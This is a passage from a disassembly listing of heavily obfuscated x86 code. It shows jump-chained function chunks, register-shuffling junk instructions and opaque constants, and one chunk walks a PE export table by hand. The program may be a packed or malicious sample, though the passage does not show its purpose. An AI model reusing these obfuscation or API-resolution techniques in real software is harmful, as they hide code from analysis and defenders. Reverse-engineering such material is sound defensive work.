; END OF FUNCTION CHUNK FOR sub_42D01B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_427C8D: ; CODE XREF: sub_424AA8+15F0�j
jmp loc_42C219
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
dw 2010h
dword_427C94 dd 0 ; sub_42D757:loc_42C3CF�o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_427C98: ; CODE XREF: sub_42AFFE-6C7F�j
jmp nullsub_107
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
db 0F6h, 83h, 0FCh
dword_427CA0 dd 7C800000h ; sub_42ABF7+4�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_427CA4: ; CODE XREF: sub_425E64+76C2�j
jmp loc_42A7D4
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_427CA9: ; CODE XREF: sub_4232DA+68EA�j
jmp loc_42DA8C
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
dw 11ACh
dd 379C56ADh, 32668D2Bh, 638D915Ch, 0B15B0E00h ; DATA XREF: sub_42BE7D+D�o
; sub_4240B0+B353�o
byte_427CC0 db 1 ; DATA XREF: sub_42DBF7-4748�w
; sub_42DBF7:loc_42FA0E�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_427CC1: ; CODE XREF: sub_42B74A+1C0D�j
jmp loc_42C669
; END OF FUNCTION CHUNK FOR sub_42B74A
; =============== S U B R O U T I N E =======================================
sub_427CC6 proc near ; CODE XREF: sub_426130:loc_424F89�p
; _7hdaygc1:00429E2A�j
; FUNCTION CHUNK AT 00425DEF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A4B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DDE3 SIZE 00000012 BYTES
xchg ebx, [esp+0]
pop ebx
or ecx, ecx
jz loc_42DDE3
loc_427CD2: ; CODE XREF: _7hdaygc1:0042D374�j
call sub_4269BB
loc_427CD7: ; CODE XREF: sub_42D503+6�j
jmp nullsub_13
sub_427CC6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427CDC: ; CODE XREF: _7hdaygc1:00428668�j
jmp loc_42B61A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_427CE2: ; CODE XREF: sub_424963+18�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_4237DA
jmp loc_42BD92
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD51
loc_427CF4: ; CODE XREF: sub_42BD51:loc_42615C�j
pop esi
mov [edx], eax
mov eax, offset dword_42BC4C
call sub_42DBEA
jmp loc_42FD50
; END OF FUNCTION CHUNK FOR sub_42BD51
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_427D07: ; CODE XREF: sub_425C3B+4CEE�j
jmp sub_428C3B
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
loc_427D0C: ; CODE XREF: _7hdaygc1:0042A45C�j
jmp locret_426FA9
; =============== S U B R O U T I N E =======================================
sub_427D11 proc near ; CODE XREF: _7hdaygc1:0042675F�p
; _7hdaygc1:00427267�j
; FUNCTION CHUNK AT 00423D6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ACE8 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
mov [ebp-4], eax
mov eax, offset dword_42BC4C
call sub_427D8E
cmp ds:dword_42BC60, 0
jnz loc_429BBE
jmp loc_423D6A
sub_427D11 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427D34: ; CODE XREF: _7hdaygc1:004260AF�j
jnb loc_428DF2
; =============== S U B R O U T I N E =======================================
sub_427D3A proc near ; CODE XREF: sub_42AA9B+2451�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424A07 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427F9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429106 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
xchg edx, [esp+0]
mov ebx, edx
pop edx
add ebx, 629A08C0h
jmp loc_427F9B
sub_427D3A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_427D4F: ; CODE XREF: sub_42C443+13�j
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_42F411
; ---------------------------------------------------------------------------
loc_427D5D: ; CODE XREF: sub_42C443+4�j
cmp dword ptr [ebp-10h], 2
jnz loc_42F411
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_42F411
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_427D73: ; CODE XREF: sub_423648-4A5�j
; sub_423648+2191�j
cmp dword ptr [ebp-1Ch], 67h
jmp loc_42D7CF
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C119
loc_427D7C: ; CODE XREF: sub_42C119+10�j
cmp al, 0A4h
jnz loc_425BED
jmp loc_42D0D5
; END OF FUNCTION CHUNK FOR sub_42C119
; ---------------------------------------------------------------------------
jmp loc_425BED
; =============== S U B R O U T I N E =======================================
sub_427D8E proc near ; CODE XREF: sub_426A62+E�p
; sub_427D8E-BE3�j ...
; FUNCTION CHUNK AT 00424A38 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427193 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042F617 SIZE 0000000A BYTES
mov edx, 1
lock xchg edx, [eax]
or edx, edx
jz nullsub_14
jmp loc_427193
sub_427D8E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_427DA3: ; CODE XREF: sub_42C16F-3DBA�j
add eax, ebx
loc_427DA5: ; CODE XREF: sub_42C16F:loc_4283A6�j
xor edx, 0E380DD97h
call sub_42C1AF
push edx
mov edx, eax
xchg edx, [esp+18h+var_18]
call sub_4259F0
; END OF FUNCTION CHUNK FOR sub_42C16F
; START OF FUNCTION CHUNK FOR sub_424E42
loc_427DBB: ; CODE XREF: sub_424E42+6�j
jmp loc_4244FC
; END OF FUNCTION CHUNK FOR sub_424E42
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_427DC0: ; CODE XREF: sub_42AFFE:loc_42ADEA�j
; sub_42AFFE+4A3A�j
xor eax, 713CD462h
add eax, ebp
add eax, 0B43804BFh
mov eax, [eax]
push offset sub_424A2B
jmp nullsub_108
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_427DDA proc near ; CODE XREF: _7hdaygc1:0042CEC1�j
; _7hdaygc1:0042E8AE�p
; FUNCTION CHUNK AT 00428179 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F737 SIZE 00000008 BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
push 1Ch
lea eax, [ebp-34h]
push eax
jmp loc_428179
sub_427DDA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edi
call sub_42D59A
; START OF FUNCTION CHUNK FOR sub_423D07
loc_427DF2: ; CODE XREF: sub_423D07+5�j
jmp nullsub_149
; END OF FUNCTION CHUNK FOR sub_423D07
; ---------------------------------------------------------------------------
loc_427DF7: ; CODE XREF: _7hdaygc1:0042846A�j
or edx, 82E6E2Bh
add ecx, eax
loc_427DFF: ; CODE XREF: _7hdaygc1:loc_429702�j
call sub_42D757
push 47B10D34h
pop edx
and edx, 0D4A91A4h
sub edx, 143A6300h
jmp loc_42CA9E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_427E1C proc near ; DATA XREF: sub_42B32F:loc_42CC53�o
push eax
call sub_428371
loc_427E22: ; CODE XREF: sub_4291A3+40D0�j
jmp nullsub_73
sub_427E1C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_427E27: ; CODE XREF: sub_42AA07+C38�j
jmp loc_42621E
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_427E2C: ; CODE XREF: sub_42E254-8F20�j
jmp loc_42357A
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_427E31: ; CODE XREF: sub_42EF91+E�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
call sub_42525E
loc_427E3F: ; CODE XREF: _7hdaygc1:0042A264�j
jmp loc_42CE5A
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425735
loc_427E44: ; CODE XREF: sub_42F9D2-C132�j
; sub_42D073:loc_4238B6�j ...
js loc_4298E4
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
push offset loc_423713
jmp nullsub_42
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_427E5B: ; CODE XREF: sub_42A833:loc_42B1D4�j
call sub_423752
loc_427E60: ; DATA XREF: _7hdaygc1:004233EC�o
xchg ebx, [esp+4+var_4]
jmp loc_42A86E
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_427E68: ; CODE XREF: sub_42B470�j
push eax
mov eax, ebp
xchg eax, [esp+4+var_4]
mov ebp, esp
push esi
loc_427E71: ; CODE XREF: sub_4253A0:loc_42DF52�j
jmp loc_427386
; END OF FUNCTION CHUNK FOR sub_42B470
; =============== S U B R O U T I N E =======================================
sub_427E76 proc near ; DATA XREF: _7hdaygc1:004247C5�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426B32 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042967A SIZE 00000012 BYTES
mov ecx, [ebp-4]
mov eax, 1
shl eax, cl
not eax
and ebx, eax
jmp loc_42967A
sub_427E76 endp
; ---------------------------------------------------------------------------
loc_427E89: ; DATA XREF: sub_42F8B9+1�o
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, dword ptr ds:loc_424696+2
or eax, eax
jnz loc_42B8FE
jmp loc_42404E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_427EA3: ; CODE XREF: sub_423DFC:loc_4231C1�j
sub eax, 55F4F997h
or eax, 11CC53F2h
test eax, 100h
jmp loc_4262BE
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B14C
loc_427EBA: ; CODE XREF: sub_42B14C:loc_42FBD6�j
rol eax, 11h
xor eax, 0D2A56A0Dh
add eax, ebp
add eax, 0A934DE93h
push eax
push 4
call sub_42D48F
; END OF FUNCTION CHUNK FOR sub_42B14C
; START OF FUNCTION CHUNK FOR sub_429A26
loc_427ED3: ; CODE XREF: sub_429A26+4C44�j
jmp sub_42F6CD
; END OF FUNCTION CHUNK FOR sub_429A26
; ---------------------------------------------------------------------------
loc_427ED8: ; CODE XREF: _7hdaygc1:004238F1�j
jmp loc_426F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BF7
loc_427EDD: ; CODE XREF: sub_426BF7+73A�j
or eax, 440390Ch
add eax, 7EEEDE36h
add eax, ebp
add eax, 6B1B61AAh
jmp loc_4293B5
; END OF FUNCTION CHUNK FOR sub_426BF7
; =============== S U B R O U T I N E =======================================
sub_427EF6 proc near ; CODE XREF: _7hdaygc1:0042C15F�j
; sub_42CB85+7�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 0042369E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423C59 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042471B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425229 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427FC1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042CDB6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042E839 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042ECEF SIZE 0000001A BYTES
xchg eax, [esp+0]
pop eax
push edi
mov edi, edx
xchg edi, [esp+0]
mov edx, eax
jmp loc_425229
sub_427EF6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_427F07: ; CODE XREF: sub_4291A3-5032�j
mov edx, 0E5254649h
call sub_42C763
mov ds:dword_425154, eax
jmp loc_425BED
; ---------------------------------------------------------------------------
loc_427F1B: ; CODE XREF: sub_4291A3:loc_424159�j
cmp ds:dword_425154, 0
jnz loc_42E1E2
call sub_425BFC
jmp loc_428745
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
loc_427F32: ; CODE XREF: _7hdaygc1:004241D3�j
jg loc_429A1B
adc edi, ebx
mov edi, 8710D97Ch
push 7D306870h
jmp loc_424CF7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428613
loc_427F4A: ; CODE XREF: sub_428613+75A9�j
jmp loc_425A48
; END OF FUNCTION CHUNK FOR sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CA9
loc_427F4F: ; CODE XREF: sub_425CA9+9869�j
jmp nullsub_124
; END OF FUNCTION CHUNK FOR sub_425CA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_427F54: ; CODE XREF: sub_423410+18E2�j
pop ebp
jmp loc_426340
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_427F5A: ; CODE XREF: sub_42D9E1+21EB�j
jnz loc_4280F2
jmp loc_42B295
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
push esi
mov esi, eax
xchg esi, [esp]
push eax
push ecx
call sub_424F2F
; =============== S U B R O U T I N E =======================================
sub_427F72 proc near ; CODE XREF: sub_42D9E1:loc_42B2EC�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424A26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424ACA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004256C3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426928 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042BA9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F6B0 SIZE 00000005 BYTES
xchg ebx, [esp-4+arg_0]
pop ebx
push eax
call sub_428C3B
add eax, [ebp-0Ch]
call sub_429412
loc_427F84: ; CODE XREF: _7hdaygc1:004241E3�p
; _7hdaygc1:004286CF�j
xchg ecx, [esp-4+arg_0]
pop ecx
push 8D13053Eh
xchg ebx, [esp-4+arg_0]
jmp loc_42BA9F
sub_427F72 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_427F96: ; CODE XREF: sub_42A052+1923�j
jmp loc_424809
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D3A
loc_427F9B: ; CODE XREF: sub_427D3A+10�j
jmp loc_424A07
; END OF FUNCTION CHUNK FOR sub_427D3A
; ---------------------------------------------------------------------------
loc_427FA0: ; CODE XREF: _7hdaygc1:00424FC0�j
jmp sub_4272FB
; ---------------------------------------------------------------------------
loc_427FA5: ; CODE XREF: _7hdaygc1:0042E1CF�j
xchg edx, [esp]
mov ebx, edx
pop edx
jmp loc_4296A2
; ---------------------------------------------------------------------------
loc_427FB0: ; CODE XREF: _7hdaygc1:loc_42B9C7�j
pop edx
mov eax, [ebp-10h]
test eax, eax
jle loc_424BDD
jmp loc_42E190
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_427FC1: ; CODE XREF: sub_427EF6+4EC7�j
jb loc_42E839
loc_427FC7: ; CODE XREF: sub_427EF6:loc_42471B�j
mov eax, 4000h
call sub_42828C
push esi
jmp loc_42ECEF
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_427FD7: ; CODE XREF: sub_428E56:loc_4246B8�j
add eax, 705EA07Dh
xchg eax, [esp+4+var_4]
jmp sub_4288FE
; END OF FUNCTION CHUNK FOR sub_428E56
; ---------------------------------------------------------------------------
test al, al
jz nullsub_195
jmp loc_423E92
; ---------------------------------------------------------------------------
loc_427FF2: ; DATA XREF: sub_42828C+3950�o
push 35F0BA7Ah
xchg ebp, [esp]
mov ebx, ebp
pop ebp
rol ebx, 6
cmp ebx, 0EDCFE153h
jmp loc_42D699
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42948A
loc_42800B: ; CODE XREF: sub_42948A:loc_42949A�j
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_42B9B8, 0
jnz loc_423E70
jmp loc_4266D7
; END OF FUNCTION CHUNK FOR sub_42948A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_428022: ; CODE XREF: sub_424AE1+224A�j
xor ebx, ecx
jmp loc_426671
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_428029: ; CODE XREF: _7hdaygc1:0042ABCD�j
add ebx, ebp
test ebx, 3C7431C8h
jmp loc_42ADD2
; ---------------------------------------------------------------------------
mov ebx, [ecx]
jmp sub_42AA11
; ---------------------------------------------------------------------------
jnp loc_42A038
jmp loc_42B9CC
; ---------------------------------------------------------------------------
loc_428048: ; CODE XREF: _7hdaygc1:0042337B�j
mov edx, [ebp+8]
loc_42804B: ; CODE XREF: _7hdaygc1:loc_42A527�j
mov [edx-18h], eax
inc dword ptr [ebp-4]
mov eax, [ebp+8]
mov eax, [eax-18h]
and eax, 7
mov [ebp-0Ch], eax
cmp dword ptr [ebp-10h], 0
jmp loc_42BA55
; ---------------------------------------------------------------------------
loc_428066: ; DATA XREF: sub_42E254:loc_42357A�o
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D65
loc_428068: ; CODE XREF: sub_424D65+7�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_424D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E254
loc_42806D: ; CODE XREF: sub_42E254-8F2E�j
push offset sub_429098
jmp loc_429BF2
; END OF FUNCTION CHUNK FOR sub_42E254
; ---------------------------------------------------------------------------
loc_428077: ; CODE XREF: _7hdaygc1:00423998�j
xchg eax, edi
; =============== S U B R O U T I N E =======================================
sub_428079 proc near ; CODE XREF: sub_42DD73-4695�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00424C27 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042BB05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F3E2 SIZE 0000000C BYTES
xchg edi, [esp+0]
pop edi
xchg ebp, [esp-4+arg_0]
push 0
jmp loc_42BB05
sub_428079 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_428088: ; CODE XREF: sub_4270E6+3DB1�j
jmp loc_42FCC0
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
loc_42808D: ; CODE XREF: _7hdaygc1:00425C27�j
jmp loc_428F11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_428092: ; CODE XREF: sub_429318:loc_423F28�j
not ebx
adc esi, 23D01B73h
jmp loc_42F894
; END OF FUNCTION CHUNK FOR sub_429318
; =============== S U B R O U T I N E =======================================
sub_42809F proc near ; CODE XREF: _7hdaygc1:004280C5�p
; _7hdaygc1:0042D190�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042AD9B SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xchg edi, [esp-4+arg_0]
jmp loc_42AD9B
sub_42809F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4280AB proc near ; CODE XREF: sub_423FA0+8�j
add esp, 0FFFFFFF8h
mov eax, 1
push offset sub_42FD11
jmp nullsub_197
sub_4280AB endp
; ---------------------------------------------------------------------------
loc_4280BD: ; DATA XREF: sub_429B49-5B61�o
push 0
mov eax, [ebp-4]
push edi
push eax
pop edi
call sub_42809F
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_4280CA: ; CODE XREF: sub_42C16F+FF9�j
jmp loc_42C62C
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4280CF: ; CODE XREF: sub_42AFFE:loc_42484B�j
cmp edx, edi
jmp loc_4236F4
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_4280D6: ; CODE XREF: sub_42D9E1+141A�j
jo loc_42CDD4
push ebx
push 74429433h
jmp loc_429AFD
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
locret_4280E7: ; CODE XREF: _7hdaygc1:0042F612�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_4280E8: ; CODE XREF: sub_42616B+2C9B�j
jmp loc_42C4ED
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425735
loc_4280ED: ; CODE XREF: sub_425735+18�j
jmp loc_42BB14
; END OF FUNCTION CHUNK FOR sub_425735
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_4280F2: ; CODE XREF: sub_4255F3+2�j
; sub_42D9E1:loc_427F5A�j
call sub_426F05
loc_4280F7: ; CODE XREF: sub_42F789+531�j
jmp loc_42EA82
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
loc_4280FC: ; CODE XREF: _7hdaygc1:loc_4236AE�j
pushf
or esi, 4D6CF6EFh
jmp loc_42656C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254BE
loc_428108: ; CODE XREF: sub_4254BE:loc_42CA23�j
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
cmp eax, [ebp-14h]
call sub_423DDB
loc_42811B: ; CODE XREF: sub_42F789-ACF7�j
jmp loc_42B068
; END OF FUNCTION CHUNK FOR sub_4254BE
; =============== S U B R O U T I N E =======================================
sub_428120 proc near ; CODE XREF: sub_426EBD+1C83�p
; _7hdaygc1:0042F723�j
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg edx, [esp-4+arg_0]
jmp sub_42B32F
sub_428120 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_42812C: ; CODE XREF: sub_423752:loc_42BA7D�j
ja loc_42F931
jmp loc_42F1B6
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_428137: ; CODE XREF: sub_4232DA+938A�j
cmp edi, 0B3C822ACh
jmp loc_42FC73
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_428142: ; CODE XREF: sub_42C26B-37E2�j
pop esi
rol esi, 1Eh
xor esi, 7D9AB682h
and eax, esi
pop esi
jmp loc_423393
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_428154: ; CODE XREF: sub_42567E:loc_42DA52�j
ror eax, 9
jmp loc_424946
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
and ebp, esi
and ebp, 84C982BAh
jmp sub_426064
; ---------------------------------------------------------------------------
loc_428169: ; CODE XREF: _7hdaygc1:004258E1�j
jz loc_4281F2
; START OF FUNCTION CHUNK FOR sub_423CCC
loc_42816F: ; CODE XREF: sub_423CCC+7435�j
jmp loc_428F5D
; END OF FUNCTION CHUNK FOR sub_423CCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_428174: ; CODE XREF: sub_42C16F-3C51�j
jmp loc_4294F8
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DDA
loc_428179: ; CODE XREF: sub_427DDA+D�j
jmp loc_42F737
; END OF FUNCTION CHUNK FOR sub_427DDA
; ---------------------------------------------------------------------------
loc_42817E: ; CODE XREF: _7hdaygc1:00425EF6�j
jmp loc_425F10
; ---------------------------------------------------------------------------
push esi
cmp edi, ecx
jmp loc_42CF60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCFE
loc_42818B: ; CODE XREF: sub_42CCFE:loc_42D82D�j
mov eax, [ebp-14h]
mov [ebp-0Ch], eax
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
jmp loc_428F2B
; END OF FUNCTION CHUNK FOR sub_42CCFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42819F: ; CODE XREF: sub_4291EA:loc_42E3B1�j
popf
xchg edx, [esp+0]
mov eax, [ebp+var_8]
push edi
jmp loc_42F9BC
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
loc_4281AC: ; CODE XREF: _7hdaygc1:0042E8F3�j
sbb ebp, edx
; START OF FUNCTION CHUNK FOR sub_4295F7
loc_4281AE: ; CODE XREF: _7hdaygc1:loc_426538�j
; sub_4295F7:loc_42E8DD�j
and esi, 1084229Fh
jnz loc_42A112
; END OF FUNCTION CHUNK FOR sub_4295F7
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4281BA: ; CODE XREF: sub_42AFFE+2500�j
jmp loc_4241B8
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B78
loc_4281BF: ; CODE XREF: sub_425B78+6FC6�j
jmp loc_429F63
; END OF FUNCTION CHUNK FOR sub_425B78
; ---------------------------------------------------------------------------
jns loc_42F6B5
xchg edi, eax
jmp loc_42A112
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4281D2: ; CODE XREF: _7hdaygc1:0042E87D�j
sbb edi, ebx
pop esi
jmp sub_42E0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DAD9
loc_4281DA: ; CODE XREF: sub_42DAD9:loc_426996�j
pop eax
and eax, 0B9C5D3F7h
cmp eax, 9E50DE7Ch
jmp loc_42BA4F
; END OF FUNCTION CHUNK FOR sub_42DAD9
; ---------------------------------------------------------------------------
loc_4281EC: ; CODE XREF: _7hdaygc1:0042CF6A�j
jnp loc_428F4D
loc_4281F2: ; CODE XREF: _7hdaygc1:loc_428169�j
xor eax, ds:4000F6h
and eax, 96BF2EF2h
push offset sub_423E31
jmp locret_429339
; ---------------------------------------------------------------------------
loc_428208: ; DATA XREF: sub_42F8F6:loc_42F220�o
push edx
mov edx, ebp
xchg edx, [esp]
mov ebp, esp
call sub_42C67D
; START OF FUNCTION CHUNK FOR sub_424359
loc_428215: ; CODE XREF: sub_424359+2AA5�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_424359
; =============== S U B R O U T I N E =======================================
sub_42821A proc near ; CODE XREF: sub_42FD11-AB4D�p
; _7hdaygc1:0042F2DA�j
; FUNCTION CHUNK AT 00423056 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00423804 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E1AD SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
call sub_42616B
test eax, eax
jz loc_42E49F
jmp loc_423804
sub_42821A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_428230: ; CODE XREF: sub_42B907-12A1�j
adc eax, ecx
adc ebp, edi
sbb eax, 0F2B466C3h
push ebx
jmp loc_42395F
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
locret_428240: ; CODE XREF: _7hdaygc1:0042C7CF�j
